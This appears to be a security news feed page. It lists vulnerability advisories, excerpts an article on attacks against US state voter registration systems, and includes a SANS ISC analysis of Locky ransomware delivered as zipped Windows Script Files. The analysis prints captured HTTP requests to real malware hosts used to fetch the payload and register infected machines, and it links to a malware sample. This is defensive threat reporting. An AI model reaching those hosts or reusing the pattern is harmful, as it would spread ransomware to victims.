[security bulletin] HPSBHF03641 rev.1 - HPE Integrated Lights-Out 3 (iLO 3), Remote Disclosure of Information
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Linux Kernel CVE-2016-2117 Remote Buffer Overflow Vulnerability
 
Mozilla Firefox Multiple Security Vulnerabilities
 

Sophisticated hackers use the command line with their pinkies raised and wear cashmere balaclavas.

The profile of attacks on two US state voter registration systems this summer presented in an FBI "Flash" memo suggests that the states were hit by a fairly typical sort of intrusion. But an Arizona official said that the Federal Bureau of Investigation had attributed an attack that succeeded only in capturing a single user's login credentials to Russian hackers and rated the threat from the attack as an "eight on a scale of ten" in severity. An Illinois state official characterized the more successful attack on that state's system as "highly sophisticated" based on information from the FBI.

Arizona Secretary of State Office Communications Director Matt Roberts told the Post's Ellen Nakashima that the FBI had alerted Arizona officials in June of an attack by Russians, though the FBI did not state whether they were state-sponsored or criminal hackers. The attack did not gain access to any state or county voter registration system, but the username and password of a single election official was stolen. Roberts did not respond to requests from Ars for clarification on the timeline and other details of the attack.

Based on the details provided by Roberts to the Post, it's not clear if the Arizona incident was one of the two referred to in the FBI "Flash" published this month. The FBI has not responded to questions about the memorandum on the attacks first published publicly by Yahoo News' Michael Isikoff, but a SQL injection attack wouldn't seem to be the likely culprit for stealing a single username and password. It's more likely that the Gila County election official whose credentials were stolen was the victim of a phishing attack or malware.

Read 5 remaining paragraphs | Comments

 
Huawei UMA Multiple Command Injection Vulnerabilities
 
Huawei UMA Security Bypass and Information Disclosure Vulnerabilities
 
Multiple Kaspersky Products Out of Bounds Read Multiple Local Information Disclosure Vulnerabilities
 
LibTIFF Multiple Out of Bounds Memory Corruption Vulnerabilities
 
LibTIFF 'libtiff/tif_next.c' Memory Corruption Vulnerability
 
Multiple Kaspersky Products Local Denial of Service Vulnerabilities
 
Under Secretary of Commerce for Standards and Technology and National Institute of Standards and Technology (NIST) Director Willie E. May has appointed Patricia A. (Patty) Hatter to a four-year term on the NIST Information Security and ...
 
Oracle MySQL CVE-2016-0641 Remote Security Vulnerability
 
Oracle MySQL CVE-2016-0640 Remote Security Vulnerability
 
LibTIFF 'tiffcrop.c' Heap Buffer Overflow Vulnerability
 

Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isnt all that different. Windows Script is essentially JavaScript. The only difference is the tag at the beginning of the file.

Todays subject for the e-mail was Transaction details. Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.

GET /2tn0o HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflate .NET CLR 3.5.30729)Host: onlybest76.xyzConnection: Keep-Alive

Just like earlier versions, it then registers the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://95.85.19.195/data/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cache  .NET CLR 3.5.30729)Host: 95.85.19.195Content-Length: 942Connection: Keep-Alive  

[post data omitted]

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: blind chicken ).

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
LibTIFF '_TIFFVGetField()' Function Arbitrary Command Execution Vulnerability
 
LibTIFF CVE-2016-3990 Heap Buffer Overflow Vulnerability
 
Linux kernel 'key_reject_and_link()' Function Local Use After Free Denial of Service Vulnerability
 
mDNSResponder CVE-2015-7987 Multiple Buffer Overflow Vulnerabilities
 
Libxml2 'xmlsave.c' Denial of Service Vulnerability
 
MantisBT 'Content Security Policy' Security Bypass Vulnerability
 
Lighttpd 'http_auth.c' Security Bypass Vulnerability
 
NTP CVE-2016-1550 Local Security Bypass Vulnerability
 
NTP CVE-2016-2518 Denial of Service Vulnerability
 
NTP CVE-2015-7978 Denial of Service Vulnerability
 
NTP CVE-2015-7701 Denial of Service Vulnerability
 
[slackware-security] kernel (SSA:2016-242-01)
 
[security bulletin] HPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System (vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information, Remote Denial of Service (DoS), Remote Disclosure of Information
 
Internet Storm Center Infocon Status